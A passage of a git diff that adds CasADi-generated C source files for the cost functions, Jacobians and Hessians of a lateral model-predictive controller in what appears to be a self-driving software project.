_CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_0_hess_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; +static const casadi_int casadi_s3[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s4[8] = {5, 5, 0, 0, 0, 0, 0, 0}; + +/* lat_cost_y_0_hess:(i0[4],i1,i2[5],i3[2])->(o0[5x5,0nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_hess(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_hess_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_hess_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_hess_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_hess_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_hess_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_hess_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_0_hess_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_0_hess_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_0_hess_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_0_hess_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_0_hess_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_0_hess_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_0_hess_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_0_hess_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_0_hess_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.c new file mode 100644 index 000000000..4e3869c68 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.c @@ -0,0 +1,156 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_e_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[3] = {0, 0, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[7] = {3, 1, 0, 3, 0, 1, 2}; + +/* lat_cost_y_e_fun:(i0[4],i1[],i2[2])->(o0[3]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[2]? arg[2][0] : 0; + a1=10.; + a0=(a0+a1); + a1=arg[0]? arg[0][2] : 0; + a1=(a0*a1); + if (res[0]!=0) res[0][1]=a1; + a1=arg[0]? arg[0][3] : 0; + a0=(a0*a1); + if (res[0]!=0) res[0][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_e_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_e_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_e_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_e_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_e_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_e_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_e_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun_jac_ut_xt.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun_jac_ut_xt.c new file mode 100644 index 000000000..a5db15012 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun_jac_ut_xt.c @@ -0,0 +1,164 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_e_fun_jac_ut_xt_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[3] = {0, 0, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s4[9] = {4, 3, 0, 1, 2, 3, 1, 2, 3}; + +/* lat_cost_y_e_fun_jac_ut_xt:(i0[4],i1[],i2[2])->(o0[3],o1[4x3,3nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[2]? arg[2][0] : 0; + a1=10.; + a0=(a0+a1); + a1=arg[0]? arg[0][2] : 0; + a1=(a0*a1); + if (res[0]!=0) res[0][1]=a1; + a1=arg[0]? arg[0][3] : 0; + a1=(a0*a1); + if (res[0]!=0) res[0][2]=a1; + a1=1.; + if (res[1]!=0) res[1][0]=a1; + if (res[1]!=0) res[1][1]=a0; + if (res[1]!=0) res[1][2]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_jac_ut_xt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_jac_ut_xt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_jac_ut_xt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_jac_ut_xt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_jac_ut_xt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_jac_ut_xt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_jac_ut_xt_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_fun_jac_ut_xt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_e_fun_jac_ut_xt_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_e_fun_jac_ut_xt_n_out(void) { return 2;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_e_fun_jac_ut_xt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_e_fun_jac_ut_xt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_e_fun_jac_ut_xt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_e_fun_jac_ut_xt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_e_fun_jac_ut_xt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + case 1: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_fun_jac_ut_xt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 2; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_hess.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_hess.c new file mode 100644 index 000000000..54bf12910 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_hess.c @@ -0,0 +1,148 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_e_hess_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[3] = {0, 0, 0}; +static const casadi_int casadi_s2[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s3[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s4[7] = {4, 4, 0, 0, 0, 0, 0}; + +/* lat_cost_y_e_hess:(i0[4],i1[],i2[3],i3[2])->(o0[4x4,0nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_hess(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_hess_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_hess_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_hess_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_hess_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_hess_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_hess_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_e_hess_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_e_hess_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_e_hess_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_e_hess_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_e_hess_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_e_hess_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_e_hess_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_e_hess_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_e_hess_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_fun.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_fun.c new file mode 100644 index 000000000..d6f3db3c2 --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_fun.c @@ -0,0 +1,163 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; + +/* lat_cost_y_fun:(i0[4],i1,i2[2])->(o0[5]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[2]? arg[2][0] : 0; + a1=10.; + a1=(a0+a1); + a2=arg[0]? arg[0][2] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][1]=a2; + a2=arg[0]? arg[0][3] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][2]=a2; + a2=arg[1]? arg[1][0] : 0; + a1=(a1*a2); + if (res[0]!=0) res[0][3]=a1; + a1=1.0000000000000001e-01; + a0=(a0+a1); + a2=(a2/a0); + if (res[0]!=0) res[0][4]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int lat_cost_y_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real lat_cost_y_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* lat_cost_y_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* lat_cost_y_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_fun_jac_ut_xt.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_fun_jac_ut_xt.c new file mode 100644 index 000000000..db1e3598d --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_fun_jac_ut_xt.c @@ -0,0 +1,174 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) lat_cost_y_fun_jac_ut_xt_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +static const casadi_int casadi_s0[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[6] = {2, 1, 0, 2, 0, 1}; +static const casadi_int casadi_s3[9] = {5, 1, 0, 5, 0, 1, 2, 3, 4}; +static const casadi_int casadi_s4[13] = {5, 5, 0, 1, 2, 3, 4, 5, 2, 3, 4, 0, 0}; + +/* lat_cost_y_fun_jac_ut_xt:(i0[4],i1,i2[2])->(o0[5],o1[5x5,5nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a0=arg[2]? arg[2][0] : 0; + a1=10.; + a1=(a0+a1); + a2=arg[0]? arg[0][2] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][1]=a2; + a2=arg[0]? arg[0][3] : 0; + a2=(a1*a2); + if (res[0]!=0) res[0][2]=a2; + a2=arg[1]? arg[1][0] : 0; + a3=(a1*a2); + if (res[0]!=0) res[0][3]=a3; + a3=1.0000000000000001e-01; + a0=(a0+a3); + a2=(a2/a0); + if (res[0]!=0) res[0][4]=a2; + a2=1.; + if (res[1]!=0) res[1][0]=a2; + if (res[1]!=0) res[1][1]=a1; + if (res[1]!=0) res[1][2]=a1; + if (res[1]!=0) res[1][3]=a1; + a0=(1./a0); + if (res[1]!=0) res[1][4]=a0; + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_jac_ut_xt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_jac_ut_xt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_jac_ut_xt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_jac_ut_xt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int lat_cost_y_fun_jac_ut_xt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_jac_ut_xt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void lat_cost_y_fun_jac_ut_xt_incref(void) { +} + 